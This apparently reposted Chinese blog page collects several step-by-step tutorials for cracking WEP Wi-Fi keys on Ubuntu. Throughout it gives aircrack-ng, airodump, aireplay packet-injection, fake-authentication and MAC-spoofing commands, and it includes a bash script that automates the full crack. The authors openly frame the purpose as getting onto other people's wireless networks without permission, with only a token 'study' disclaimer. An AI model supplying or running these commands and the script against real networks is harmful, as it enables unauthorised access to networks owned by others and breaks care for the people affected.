• 用Ubuntu破解wep无线加密


    用Ubuntu破解wep无线加密2009-09-29 09:50一、安装ubuntu和aircrack-ng
    先安装 Ubuntu最新版,更新系统到最新
    终端中输入 sudo apt-get install aircrack-ng 安装aircrack-ng
    没联网的话 到别的电脑上网下载aircrack-ng Ubuntu DEB安装包 安装

    二、破解过程
    1、启动无线网卡的监控模式,在终端中输入:sudo airmon-ng start wlan0
    (wlan0是无线网卡的端口,可在终端中输入 ifconfig 查看)

    2、查看无线AP在终端中输入:
    sudo airodump-ng mon0
    (特别说明:启动监控模式后无线网的端口现在是 mon0 !!!)
    看看有哪些采用wep加密的AP在线,然后按 ctrl+c 退出,保留终端

    3、抓包
    另开一个终端,输入:
    sudo airodump-ng -c 6 --bssid AP's MAC -w wep mon0
    (-c 后面跟着的6是要破解的AP工作频道,--bissid后面跟着的AP's MAC是要欲破解AP的MAC地址,-w后面跟着wep的是抓下来的数据包DATA保存的文件名,具体情况根据步骤2里面的在线AP更改频道和MAC地 址,DATA保存的文件名可随便命名)

    4、与AP建立虚拟连接
    再另开一个终端,输入:
    sudo aireplay-ng -1 0 -a AP's MAC -h My MAC mon0
    (-h后面跟着的My MAC是自己的无线网卡的MAC地址)

    5、进行注入
    成功建立虚拟连接后输入:
    sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC mon0
    现在回头看下步骤3的终端是不是DATA在开始飞涨!

    6、解密
    收集有5000个以上的DATA之后,另开一个终端,输入:
    sudo aircrack-ng wep*.cap
    进行解密
    (如果没算出来的话,继续等,aircrack-ng 会在DATA每增加多5000个之后就自动再运行,直到算出密码为至)

    7、收工
    破 解出密码后在终端中输入 sudo airmon-ng stop mon0 关闭监控模式,不然无线网卡会一直向刚刚的AP进行注入的,用ctrl+c退出或者直接关闭终端都是不行的。 现在可以冲浪去了,或者重复步聚1-7破解其它的AP 呵呵兄弟们冲浪时可别太猛了,不然把主人给冲翻了可就不好。


    ///////////////////////////////////////////////////
    用Ubuntu破解WEP密钥

      看了这篇文章,任何人都可以安装和运行Linux,并破解WEP密钥。我一共花了整整两天,并阅读了大量资料才做出这个东西,现在拿出来和大家分享。

      看了这篇文章,任何人都可以安装和运行Linux,并破解WEP密钥。我一共花了整整两天,并阅读了大量资料才做出 这个东西,现在拿出来和大家分享。我不是Linux方面的专家。你所需要的就是一个有无线网卡的旧笔记本和一份Ubuntu Linux的拷贝,这是目前最流行并且最易于安装的Linux发行版本之一。

      第一步,很显然,是安装Ubuntu。从CD启动,按指示操作,非常简单。要注意的是,接下来的每一步都要有序进行,否则就达不到预期目标。

      下一步是安装其它程序。首先要保证你的本本可以联网。安装其它程序,需要打开一个终端窗口,并键入如下代码:


      sudo cp /etc/apt/sources.list /etc/apt/sources.list_backup

      sudo gedit /etc/apt/sources.list
     

      在编辑器中,用以下代码代替其它东西:


      ## Add comments (##) in front of any line to remove it from being checked.
      ## Use the following sources.list at your own risk.

      deb http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse

      deb-src http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse

      ## MAJOR BUG FIX UPDATES produced after the final release

      deb http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse

      deb-src http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse

      ## UBUNTU SECURITY UPDATES

      deb http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse

      deb-src http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse

      ## BACKPORTS REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)

      deb http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse

      deb-src http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse

      ## PLF REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)

      deb http://packages.freecontrib.org/ubuntu/plf dapper free non-free

      deb-src http://packages.freecontrib.org/ubuntu/plf dapper free non-free
     

        保存文件、退出编辑器。敲入如下命令:


    sudo apt-get update

        现在我们可以安装后续将会用到的包了:


      sudo apt-get install build-essential

      sudo apt-get install aircrack

      sudo apt-get install kismet

      sudo apt-get install airsnort

      sudo apt-get install linux-source

      sudo apt-get install linux-headers

      sudo apt-get install sharutils
     

      接下来你应该更新整个系统,方法是,进入系统菜单——>Administration——>Update Manager。单击“Check”,开始安装更新。然后重启系统。完成后,为Madwifi驱动打补丁。

      这个地方可能会有点复杂。我的无线网卡(Linksys WPC55AG)用的是Atheros驱动,我需要对之打补丁。如果你的驱动和我的不同,你需要研究一下是否需要为驱动打补丁,是否甚至可以和 Aircrack套件协同工作。Aircrack-ng.org的论坛是一个用来测试的好地方,当然了,google search也是的。如果你的网卡也是Atheros的,我们称之为ath0,那么,在终端窗口敲入iwconfig,会出现一行字符,显示以太网控制器 是Atheros Communications……

      我们来打补丁。当发现硬盘旧的驱动时,会暂时让你的无线网卡无法工作。先进入/usr/src目录,下载新的驱动、删掉老驱动,然后安装新驱动,并打上补丁。你可以把以下代码拷贝粘贴到终端:


      sudo -i
      cd /usr/src

      wget http://syserr.com/stuff/madwifi-cvs-20051025.tar.gz

      wget http://syserr.com/stuff/madwifi-cvs-20051025.patch

      ifconfig ath0 down

      rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal

      find /lib/modules -name ‘ath*’ -exec rm -v {} \;

      find /lib/modules -name ‘wlan*’ -exec rm -v {} \;

      tar zxvf madwifi-cvs-20051025.tar.gz

      cd madwifi

      patch -Np1 -i ../madwifi-cvs-20051025.patch

      make && make install

      modprobe ath_pci
     

       如果你用的是Atheros驱动,接下来我们旧需要配置kismet了。如果你用的是其它驱动,就必须看你所使用的语法。首先进入Kismet配置,然后改变源代码行。


    sudo gedit /etc/kismet/kismet.conf

      把以“source=”打头的代码行变为“source=madwifi_ag,ath0,madwifi”,重启计算机。重启后你将可以通过无线网卡访问英特网。

      现在我们开始破解。打开一个终端窗口,进入监控模式,运行ksimet。


      sudo airmon start ath0

      sudo kismet
     

      找到你想要破解的无线网络,需要注意其ESSID和通道,然后敲Ctrl-C退出。

      接下来运行airodump。


    sudo airodump ath0 filename channel# 1

      文件名随你意,可以作为ivs文件存在你的home目录下,或者存在你运行命令的任何目录下。

      从airodump中拷贝无线网络的bssid,具体做法是选中后敲Shift+Ctrl+C。打开一个新的终端窗口,以便我们可以运行 aireplay,开始注入数据包,导致数据量上升。我们想要airodump中的数据栏显示在10万到40万之间。数据包越多,aircrack就可以 越快地找到WEP密钥。如果WEP密钥是128位的,我们可能需要多达100万个数据包。


    sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0

      应该把网络和无线连接联系起来。如果总是超时,你需要离无线路由器更近,或通过“sudo iwconfig ath0 rate 1M”改变接口速率。

      接下来我们想开始注入数据包。


    sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0

      起初只是读取数据包,并且报告0个ARP请求、发送0个数据包。只需要等一两分钟,就会开始大量发送数据包了。如果返回文本,并报告说已经被削弱了,那么敲Ctrl+C,重新运行命令。可以通过敲入下面这条命令来加速任何事情:


    sudo aireplay -0 ath0 -a BSSID ath0

      否则就只坐等事情慢慢进行吧。随着数据包开始被发送,Airodump中的数据栏就开始飙升。等到收到了预期数量的数据包,打开一个新的终端窗口,运行aircrack。


    sudo aircrack filename.ivs

      一分钟后,aircrack应该返回WEP密钥。如果没有返回,那就继续回收更多的数据包。

      这做起来一点都不费劲,但可以起作用。

    ubuntu下wep密码破解脚本

    #!/bin/bash
    #ubuntu下WEP密码破解 version 2.0
    MY_MAC=$(set $(ifconfig|grep "wlan0") && echo $5)
    AP_MAC=ff:ff:ff:ff:ff:ff
    yn=y
    ##准备区
    if [ ! -f /usr/sbin/airmon-ng ] ;then
    sudo apt-get install aircrack-ng
    fi
    ##破解区
    while [ "$yn" == "y" ]
    do
    echo "启动无线网卡的监控模式"
    sudo airmon-ng start wlan0
    read -p "查看可用AP,等会好了就按ctrl+c,先回车吧" tmp
    sudo airodump-ng mon0
    trap "echo 继续" INT
    read -p "欲破解AP的MAC地址:" AP_MAC
    read -p "使用的频道(默认6):" tmp
    CHANNEL=${tmp:-6}
    read -p "临时文件名(默认wep):" tmp
    FILE=${tmp:-wep}
    gnome-terminal -e "sudo airodump-ng -c "$CHANNEL" --bssid "$AP_MAC" -w "$FILE" mon0"
    echo "与AP建立虚拟连接"
    sudo aireplay-ng -1 0 -a "$AP_MAC" -h "$MY_MAC" mon0
    echo "进行注入"
    gnome-terminal -e "sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b "$AP_MAC" -h "$MY_MAC" mon0"
    read -p "请在DATA达到5000后按回车开始破解" tmp
    sudo aircrack-ng "$FILE"*.cap
    echo "清理战场"
    rm "$FILE"*
    read -p "继续不?" tmp
    case tmp in
    [yY]|[yY][eE][sS]) yn=y;;
    [nN]*) yn=n;;
    *) exit 0;;
    esac
    done
    sudo airmon-ng stop mon0


    ubuntu下破解wep无线密码 2009-11-07 02:38 (分类:linux)
    这个事情本来就是个走在道德边缘的事儿,所以我就无耻的说站在研究学习的角度上大家研究研究吧。。。。


    一、软硬件环境


    1.最起码你得有个带无线网卡的本本或者台式机吧?

    2.RT,你得装上和我一样的ubuntu系统吧?你没装或者不打算装的话就别往下看了。

    3.通过新立得软件管理器或者通过apt-get install 来安装aircrack-ng这个软件包(会提示你一并安装iw这个包)。

    二、破解过程:

    1.开第一个shell窗口,输入ifconfig -a 看到你的无线网卡,显示为wlan0,将mac地址复制粘贴到一个文档中,后面要用到。

    2.启用无线网卡。输入ifconfig wlan0 up

    再输入airmon-ng start wlan0  11  开启信道6的监听,或者输入airmon-ng start wlan0开启所有信道的监听。当然如果你要破解的无线再信道n上,将6替换成对应的数值n就可以了。

    3.输入airodump-ng --ivs -w name -c 11 mon0 截取数据包。name是截取的包生成文件的名字,可以随便起,我们以name为例;11是信道,同样是替换成你要破解无线所在信道对应的数值。回车确认 后,在出现的shell里找到你要破解无线对应的BSSID,也就是AP的MAC,也复制或者记录到文档里,后面要用到。

    7.建立虚拟连接:开第二个shell窗口,输入aireplay-ng -1 0 -a <目标AP MAC> -h <自己的瑞银MAC> mon0,当出现笑脸后连接成功。刚才复制的mac用上了吧?呵呵!
    (这步很关键,不行的话就多试几次,输入iwconfig mon0 rate 2M 降低传输速度对建立连接有帮助)

    8.aireplay-ng -2 -p 0841 -c ffffffffffff -b <目标AP MAC> -h <自己的无线网卡MAC> mon0 进行交互式攻击。如成功输入Y确认

    9.耐心等待第一个shell窗口的data的数字增加到1.5万以上。如果信号好的话很快,信号一般的话可以去看电视了。。。

    10.开第三个shell窗口,输入aircrack-ng -n 64 -b <目标AP MAC> name*.ivs  。这里的64是指你破解的无线密码是64位加密的,如果没有破解成功,则改成128位再试,应该没有问题!

    11.如果顺利,马上就能得到Key了。

    最后,希望在蹭或者将要蹭别人无线用的朋友能有一点公德心,收发下email、上个QQ、再顶多上个网页就可以了,不要看在线视频、下载东西,不要影响无线主人的正常使用,人家是花了银子的!


    Ubuntu下无客户端无线WEP加密破解实战讲解2008-04-24 13:31在图形界面中,打开一个Shell,如下图,输入ifconfig -a        察看当前网卡
           
    这里我就使用USB网卡为例,可以看到有一个名为rausb0的网卡,状态是未载入,这里先不要载入,先将MAC地址修改成需伪造的任意MAC地址,
           
    输入macchanger –m 00:11:22:33:44:55 rausb0
             
    -m后跟要伪造的MAC,之后再跟要修改的网卡名即可,这里我们将该USB网卡MAC修改成00:11:22:33:44:55
    然后再载入网卡,输入:
        
    ifconfig -a rausb0 up来载入USB网卡驱动    
    下来,我们可以使用如Kismet、Airosnort等工具来扫描当前无线网络的AP,
        
    然后,我们需要将网卡激活成monitor模式,才可以进行后续的破解,命令如下:
        
    airmon-ng start rausb0 3,这里这个3就是我们发现的AP的频道,然后输入下列命令开始抓包
    airodump-ng -w test.cap --channel 3 rausb0 ,这里test.cap就是我设置的抓包文件名

    下来,就可以进行FakeAuth攻击,这种攻击就是专门在预攻击无线接入点AP没有客户端活动甚至不存在Client的情况下使用的。具体命令如下:
    aireplay-ng -1 1 -e AP’s ESSID -a AP’s MAC -h FakeMAC rausb0
    这里-1指的就是采用FakeAuth攻击模式,后面跟延迟;-e后面跟AP的ESSID,-a后面设置AP的MAC,-h后面则是前面伪造的MAC,最后是无线网卡。

    与此同时,为了IVs(初始化向量)的获取,必须进行ArpRequest注入式攻击,这个很重要,可以有效提高抓包数量及破解速度,命令如下
    aireplay-ng -3 -b   AP's MAC   -h Client's MAC   -x 1024 rausb0
    解释一下:-3指的是采取ArpRequest注入攻击方式,-b后面跟上要入侵的AP的MAC地址,-h后面跟的是监测到的客户端MAC地址,这里我们使用刚才伪造的客户端MAC,如上图中显示的,至于-x 1024指的是定义每秒发送数据包数量,这个值可以小一些,但最高1024就可以了,这里我使用默认,最后是指定USB无线网卡接下来,就可以同步开启aircrack-ng来进行同步破解了,命令如下:
        
    aircrack-ng -x -f 2   test-01.cap这里-x是暴力破解模式,-f指的是启用密码复杂度为2 ,后面是我们即时保存的那个抓包文件,
     

  • 相关阅读:
    sql中的Bulk 导入txt文本
    通过SQL自动添加流水号
    JAVA XML格式化输出
    nginx 服务端口权限13的问题
    使用hangfire在xunit中
    自动提交代码
    系统性能测试
    前端性能——速度之书
    node fs相对路径
    yum 初始化国内
  • 原文地址:https://www.cnblogs.com/Chinasf/p/1729455.html
Copyright © 2020-2023  润新知